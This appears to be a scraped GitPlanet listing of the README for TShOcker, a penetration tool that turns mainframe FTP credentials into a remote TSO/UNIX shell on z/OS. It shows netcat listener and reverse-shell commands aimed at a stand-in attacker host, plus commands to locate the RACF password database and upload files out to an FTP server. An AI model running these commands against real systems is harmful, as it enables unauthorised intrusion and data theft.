GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → mainframed → TShOcker

mainframed / TShOcker

Licence: other
CATSO/JCL wrapper for z/OS FTP logic attack

Programming Languages

python
139335 projects - #7 most used programming language
REXX
12 projects
                  .-~*~--,.   .-.
          .-~-. ./OOOOOOOOO\.'OOO`9~~-.
        .`OOOOOO.OOM.OLSONOOOOO@@OOOOOO\
       /OOOO@@@OO@@@OO@@@OOO@@@@@@@@OOOO`.
       |OO@@@WWWW@@@@OOWWW@WWWW@@@@@@@OOOO).
     .-'OO@@@@WW@@@W@WWWWWWWWOOWW@@@@@OOOOOO}     
    /OOO@@O@@@@W@@@@@OOWWWWWOOWOO@@@OOO@@@OO|
   lOOO@@@OO@@@WWWWWWW\OWWWO\WWWOOOOOO@@@O.'
    \OOO@@@OOO@@@@@@OOW\|||||\WWWW@@@@@@@O'.
     `,OO@@@OOOOOOOOOOWW\|||||\WWWW@@@@@@OOO)
      \,O@@@@@OOOOOOWWWWW\|||||\WW@@@@@OOOO.'
        `~c~8~@@@@WWW@@W\|||||||\WOO|\UO-~'
             (OWWWWWW@/\W\|||||||\WO)
               `~-~''     \|||\WW=*'
                         __\|||\
                         \||||||\
                          \||||__\
          TShOcker         \||\
                            \|\
                             \|\
                              \\
                               \\
                                \
                                 \

TShOcker

A REXX script (CATSO) wrapped in JCL, enveloped in Python. CATSO is a rexx script meant to act like a mini command interpreter for TSO and UNIX but accessible through a simple netcat and/or any TCP bind (like metasploit). Using FTP (and JES mode) this script generates the necessary JCL needed to execute the rexx script in a temporary dataset. All you need to do is get a mainframe FTP username and password and you're good to go.

Example

Reverse Connection

Terminal 1: nc -l -p 31337

Terminal 2: ./TShOcker.py -r --rhost evil.hackervps.com --rport 31337 mainframe.ftp.corp.com jsmith dumbpass

Listener

./TShOcker.py -l --lport 31337 mainframe.ftp.corp.com jsmith dumbpass

nc mainframe.ftp.corp.com 31337

Enter command or 'help'> help

Core Commands

  • help Help Menu
  • exit Terminate the session
  • quit Terminate the session

Filesystem Commands

  • cat Show contents of dataset
  • cp copies a file to a new file
  • ls list datasets in HLQ
  • delete deletes a file
  • del also deletes a file
  • lsmem Lists files and members !!WARNING!! Takes time and IO

Networking Commands

  • ipconfig Display interfaces
  • ifconfig Display interfaces

System Commands

  • getuid Get current user name
  • sysinfo Remote system info (i.e OS)
  • racf Show password database location
  • execute Execute a TSO command
  • tso Execute TSO command (same as execute)
  • unix UNIX command (i.e ls -al)
  • ftp Upload a file from the mainframe to an FTP server. Syntax: host/ip user pass filename [binary]
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].